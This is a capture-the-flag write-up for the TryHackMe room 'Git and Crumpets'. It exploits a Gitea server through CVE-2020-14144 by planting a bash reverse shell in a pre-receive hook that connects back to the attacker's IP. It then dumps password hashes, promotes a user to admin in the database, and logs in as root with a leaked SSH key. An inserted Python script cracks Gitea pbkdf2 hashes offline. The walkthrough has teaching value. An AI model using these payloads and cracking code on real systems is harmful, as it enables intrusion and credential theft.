TryHackMe - Git and Crumpets - Writeup

Git and Crumpets

Our devs have been clamoring for some centralized version control, so the admin came through. Rumour has it that they included a few countermeasures…

Nmap scanning

root@ip-10-10-226-10:~# nmap -sCV -A 10.10.130.239 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-02 22:11 BST
Nmap scan report for ip-10-10-130-239.eu-west-1.compute.internal (10.10.130.239)
Host is up (0.00053s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.0 (protocol 2.0)
80/tcp   open   http       nginx
|_http-server-header: nginx
| http-title: 503 Service Temporarily Unavailable
|_Requested resource was http://ip-10-10-130-239.eu-west-1.compute.internal/index.html
9090/tcp closed zeus-admin
MAC Address: 02:F5:B8:0C:58:1B (Unknown)
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 3.13 (90%), Linux 3.8 (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%), Ubiquiti AirOS 5.5.9 (89%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms ip-10-10-130-239.eu-west-1.compute.internal (10.10.130.239)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.66 seconds

The target went down during the scan, so I had to restart the machine (it came back on a new IP). After the restart I found that visiting the URL in a browser sends you to the Never Gonna Give You Up YouTube video (a rickroll). The raw page source is more useful:

root@ip-10-10-1-97:~# curl 10.10.87.115
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Go away!</title>
  </head>
  <body>
    <main>
      <h1>Nothing to see here, move along</h1>
      <h2>Notice:</h2>
      <p> 
        Hey guys,
           I set up the dev repos at git.git-and-crumpets.thm, but I haven't gotten around to setting up the DNS yet. 
           In the meantime, here's a fun video I found!
        Hydra
      </p>
      <pre>

Add the hostname to /etc/hosts so it resolves to the target:

10.10.87.115 git.git-and-crumpets.thm

Now navigate to http://git.git-and-crumpets.thm/ and register an account. The site is a Gitea instance. There is a repo called cant-touch-this with five commits on the master branch.

One of the commits has a message saying the author kept the password in his avatar "to be more secure".

Download his avatar image from the server:

root@ip-10-10-1-97:~# wget http://git.git-and-crumpets.thm/avatars/3fc2cde6ac97e8c8a0c8b202e527d56d
--2021-07-03 06:58:17--  http://git.git-and-crumpets.thm/avatars/3fc2cde6ac97e8c8a0c8b202e527d56d
Resolving git.git-and-crumpets.thm (git.git-and-crumpets.thm)... 10.10.87.115
Connecting to git.git-and-crumpets.thm (git.git-and-crumpets.thm)|10.10.87.115|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [image/png]
Saving to: ‘3fc2cde6ac97e8c8a0c8b202e527d56d’

3fc2cde6ac97e8c8a0c8b202e527d56d            [ <=>                                                                          ] 278.88K  --.-KB/s    in 0.002s  

2021-07-03 06:58:17 (158 MB/s) - ‘3fc2cde6ac97e8c8a0c8b202e527d56d’ saved [285570]

root@ip-10-10-1-97:~# exiftool 3fc2cde6ac97e8c8a0c8b202e527d56d
ExifTool Version Number         : 10.80
File Name                       : 3fc2cde6ac97e8c8a0c8b202e527d56d
Directory                       : .
File Size                       : 279 kB
File Modification Date/Time     : 2021:04:15 17:13:00+01:00
File Access Date/Time           : 2021:07:03 06:58:17+01:00
File Inode Change Date/Time     : 2021:07:03 06:58:17+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 290
Image Height                    : 290
Bit Depth                       : 16
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Description                     : My 'P****d' should be easy enough to guess
Image Size                      : 290x290
Megapixels                      : 0.084

His profile shows the email address withcream@example.com, so let's try logging in with:

withcream@example.com:Password

Once logged in I wasn't sure what to do next, so I looked for things an authenticated Gitea user can do. That turned up CVE-2020-14144 (Gitea authenticated remote code execution via git hooks) and the blog post "Exploiting CVE-2020-14144 - GiTea Authenticated Remote Code Execution using git hooks". Gitea only lets admins, or users explicitly granted the git-hook permission, edit server-side hooks, so the Git Hooks tab being available to scones is what makes this usable here.

Start a netcat listener, then edit the repository's pre-receive hook in its settings and paste a reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/10.10.1.97/1234 0>&1

Now make any change through the web UI (editing README.md is enough); Gitea runs the pre-receive hook on the resulting push, as the git user.

root@ip-10-10-1-97:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.87.115 46630 received!
bash: cannot set terminal process group (881): Inappropriate ioctl for device
bash: no job control in this shell
[git@git-and-crumpets cant-touch-this.git]$ ls
ls
HEAD
branches
config
description
hooks
info
objects
refs
[git@git-and-crumpets cant-touch-this.git]$ cd ~
cd ~
[git@git-and-crumpets ~]$ ls
ls
user.txt
[git@git-and-crumpets ~]$ cat user.txt
cat user.txt
dGhte2ZkN2Fi********TdjZDcwY2YzZDZhYTE2fQ==

Decode the base64:

$ echo dGhte2ZkN2Fi********TdjZDcwY2YzZDZhYTE2fQ== | base64 -d

thm{fd7ab9ffd40*******257cd70cf3d6aa16}

Gitea stores its data under /var/lib/gitea/.

Gitea repository data will be saved into /var/lib/gitea/repos/ . It is possible to overrule this location in /etc/gitea/app
[git@git-and-crumpets data]$ ls
ls
attachments
avatars
gitea-repositories
gitea.db
indexers
lfs
queues
repo-avatars
sessions
tmp
[git@git-and-crumpets data]$ which sqlite3
which sqlite3
/usr/bin/sqlite3

Open gitea.db with sqlite3 and dump the user table (the passwd column holds salted pbkdf2 hashes, per passwd_hash_algo):

[git@git-and-crumpets data]$ sqlite3 gitea.db
sqlite3 gitea.db
select * from user;
1|hydra|hydra||hydragyrum@example.com|0|enabled|9b020d3e158bc31b5fe64d668d94cab38cadc6721a5fdf7a4b1fb7bf97021c5e68f56bd9bd44d5ce9547e5e234086342c4e4|pbkdf2|0|0|0||0|||XGySX7uBlc|3C4NzJWN9e|en-US||1618386984|1621615239|1621614217|0|-1|1|1|0|0|0|0|0|d91f03c868d38ecf84ab3cc54f876106|hydragyrum@example.com|1|0|0|0|1|0|0|0|0|unified|arc-green|0
2|root|root|groot|root@example.com|0|enabled|2181d2b5fbf1859db426bcb94d97851d9a0e87a5eb47c5edc7f92bffc45b679e554c8367084f379e59936b68c0d770823ec9|pbkdf2|0|0|0||0|||2VK8fSxvIZ|5e5xPrzvBr|en-US||1618391049|1621716065|1621716065|1|-1|1|0|1|0|0|0|0|b2b218891f86ea980812a5b934ecec1a|root@examle.com|1|0|0|0|1|0|0|0|0|unified|gitea|0
3|scones|scones||withcream@example.com|0|enabled|8d0386b217e0f1ad5a1012d879ce93c9d77fd79d888410fdee9e76ec58d6fa017042906dd9a2ea498d3fd5a7486a73875660|pbkdf2|0|0|0||0|Her Majesty's Secret Service||IF60pw0rVc|13y4Vtc2AH|en-US|I like scones.|1618492621|1625292211|1625292211|0|-1|1|0|0|1|0|0|0|3fc2cde6ac97e8c8a0c8b202e527d56d|jackel@example.com|1|0|0|0|1|0|0|0|0|unified|gitea|0
4|test|test||test@test.thm|0|enabled|d3463d9c205751364af7850bca7956d0f5cc0eb125a097db54fd0087eec31cec1912245e57fdfc53423a89e6684a15f8939a|pbkdf2|0|0|0||0|||oe4oKzc3mk|EgtShiimON|en-US||1618526457|1618526530|1618526457|0|-1|1|0|0|0|0|0|0|15c9bc2cfbc7b7fd0b627422d8189173|test@test.thm|0|0|0|0|0|0|0|0|0|unified|gitea|0
5|user101|user101||test@mail.com|0|enabled|7233dc67184372521c3e39c824016db859d608025ad5a731f1dbed0d399753c17de21921618a385804ddc6bc57893049d555|pbkdf2|0|0|0||0|||BFMsu8xkcI|mameP7va9K|en-US||1625291416|1625291644|1625291416|0|-1|1|0|0|0|0|0|0|97dfebf4098c0f5c16bca61e2b76c373|test@mail.com|0|0|0|0|0|0|0|0|0|unified|gitea|0

We have scones' credentials, and the shell runs as the same git user Gitea does, so the database is writable. Let's make that account an admin:

UPDATE user SET is_admin=1 WHERE id=3;
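Two things worth seeing in working code at this point: what the hashes in that dump are (so they can be attacked offline if a password hadn't already fallen out of an avatar), and the privilege flip done against a database rather than by hand. This is an added example, not code from the writeup or from Gitea. It assumes Gitea's "pbkdf2" algorithm is PBKDF2-HMAC-SHA256 with 10000 iterations and a 50-byte output, hex-encoded and salted with the per-user salt column (the 100-hex-character hashes in the dump are consistent with that); the in-memory table is a constructed stand-in for gitea.db with only the columns used, hydra's password is made up, and allow_git_hook=1 for scones reflects that the hook was editable as that user.

```python
import hashlib
import hmac
import sqlite3
from typing import Iterable

# Assumed parameters of Gitea's "pbkdf2" passwd_hash_algo (taken from its source,
# not confirmed against this box): PBKDF2-HMAC-SHA256, 10000 rounds, 50-byte key.
PBKDF2_ITERATIONS = 10000
PBKDF2_KEY_LEN = 50


def gitea_pbkdf2(password: str, salt: str) -> str:
    """Hash a password the way Gitea's pbkdf2 algorithm is assumed to."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                             PBKDF2_ITERATIONS, PBKDF2_KEY_LEN)
    return dk.hex()


def verify_password(password: str, salt: str, stored_hex: str) -> bool:
    """Constant-time comparison of a candidate against the stored hex hash."""
    return hmac.compare_digest(gitea_pbkdf2(password, salt), stored_hex)


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for gitea.db (only the columns used here).

    Names, emails and salts follow the dump; the hashes are recomputed, so only
    scones' password ("Password", recovered earlier) is real. hydra's is made up.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("""
        CREATE TABLE user (
            id INTEGER PRIMARY KEY, name TEXT, email TEXT, passwd TEXT,
            passwd_hash_algo TEXT, salt TEXT, is_admin INTEGER, allow_git_hook INTEGER)
    """)
    users = [
        (1, "hydra", "hydragyrum@example.com", "sample-admin-pw", "3C4NzJWN9e", 1, 0),
        (3, "scones", "withcream@example.com", "Password", "13y4Vtc2AH", 0, 1),
    ]
    for uid, name, email, pw, salt, admin, hook in users:
        conn.execute("INSERT INTO user VALUES (?,?,?,?,?,?,?,?)",
                     (uid, name, email, gitea_pbkdf2(pw, salt), "pbkdf2", salt, admin, hook))
    conn.commit()
    return conn


def crack_users(conn: sqlite3.Connection, wordlist: Iterable[str]) -> dict:
    """Offline dictionary attack over every pbkdf2 row; returns {name: password}."""
    words = list(wordlist)
    found = {}
    rows = conn.execute("SELECT name, passwd, salt FROM user WHERE passwd_hash_algo = 'pbkdf2'")
    for name, stored, salt in rows:
        for candidate in words:
            if verify_password(candidate, salt, stored):
                found[name] = candidate
                break
    return found


def get_flags(conn: sqlite3.Connection, user_id: int) -> tuple:
    """(is_admin, allow_git_hook) for one user row."""
    return tuple(conn.execute("SELECT is_admin, allow_git_hook FROM user WHERE id = ?",
                              (user_id,)).fetchone())


def promote_to_admin(conn: sqlite3.Connection, user_id: int) -> int:
    """The UPDATE from the writeup, parameterised; returns is_admin afterwards."""
    conn.execute("UPDATE user SET is_admin = 1 WHERE id = ?", (user_id,))
    conn.commit()
    return conn.execute("SELECT is_admin FROM user WHERE id = ?", (user_id,)).fetchone()[0]


if __name__ == "__main__":
    db = build_sample_db()
    print("cracked:", crack_users(db, ["letmein", "scones", "Password"]))
    print("scones flags before:", get_flags(db, 3))
    promote_to_admin(db, 3)
    print("scones flags after:", get_flags(db, 3))
```

To use it against the real file, replace build_sample_db() with sqlite3.connect("gitea.db"); the real table has many more columns, but the names queried here are the same. If verify_password never matches a password you know to be correct, the assumed PBKDF2 parameters do not match the server's Gitea version, which is the first thing to check before blaming the wordlist.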

Now that scones is an admin, we can browse root's repositories, including one called backup that was not visible before.

It has two branches, master and dotfiles; the dotfiles branch contains four commits.

One of them, Add '.ssh/Sup3rS3cur3', checks in an SSH private key at .ssh/Sup3rS3cur3:

-----BEGIN OPENSSH PRIVATE KEY-----
[....]
-----END OPENSSH PRIVATE KEY-----

Copy the private key into a file and use it to connect. The key is passphrase-protected; when prompted I used Su****ur3.

Make sure the key file is readable only by you, otherwise ssh refuses to use it:

root@ip-10-10-1-97:~# nano id_rsa
root@ip-10-10-1-97:~# chmod 600 id_rsa
root@ip-10-10-1-97:~# ssh -i id_rsa root@git.git-and-crumpets.thm
The authenticity of host 'git.git-and-crumpets.thm (10.10.87.115)' can't be established.
ECDSA key fingerprint is SHA256:Tm4zUvVK5KsvOsFB2xvRHK4yg58piyOwURqB1Zr2tXI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'git.git-and-crumpets.thm,10.10.87.115' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Last login: Fri Jul  2 23:11:30 2021
[root@git-and-crumpets ~]# whoami
root
[root@git-and-crumpets ~]# cat /root/root.txt
dGhtezYzMjAyMjhkZDllMzE1ZjI4M2I3NTg4NzI0MGRjNmExfQ==
[root@git-and-crumpets ~]# echo dGhtezYzMjAyMjhkZ*****ZjI4M2I3NTg4NzI0MGRjNmExfQ== | base64 -d
thm{6320228dd9e315*****75887240dc6a1}

And that's root as well.

Room link: Git and Crumpets

Written on July 3, 2021